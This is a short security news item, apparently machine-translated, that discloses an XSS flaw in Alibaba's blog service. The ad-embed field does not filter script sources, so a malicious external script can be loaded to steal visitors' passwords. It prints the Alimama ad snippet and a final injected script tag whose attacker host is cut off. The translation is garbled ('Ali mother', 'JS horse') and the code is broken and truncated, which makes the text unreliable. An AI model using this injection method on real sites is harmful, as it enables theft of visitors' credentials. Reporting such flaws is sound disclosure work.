Alibaba network blog now can be exploited to insert malicious code

according to the domestic security organization of the security cordon "detection, Alibaba network blog loopholes, because the filter is not strict, unscrupulous hackers or may be linked by loading JS code, thereby stealing passwords or visitor related property caused by XSS attack. Details are as follows:

article author: attacker

source: security cordon

article notes: Ma has been sent to E-MAIL

in the Alibaba network blog allows us to add the Ali Mama advertising, but he did not filter out except Ali mother outside the address, so you can use the JS horse, not simple in using a simple method:

< script type=" text/JavaScript" >
alimama_pid=" mm_10031051_1309365_2877941"
alimama_titlecolor=" 0000FF"
alimama_descolor =" 000000"
alimama_bgcolor=" FFFFFF"
alimama_bordercolor=" E6E6E6"
alimama_linkcolor=" 008000"
alimama_bottomcolor=" FFFFFF"
alimama_anglesize=" 0"
alimama_bgpic=" 0"
alimama_icon=" 0"
alimama_sizecode=" 22"
alimama_width=120;
alimama_height=240;
alimama_type=2;
< /script>
< script src=" http://s.a.alimama.cn/js.js& quot; type=text/javascript> < /script>
< script src=" http //>: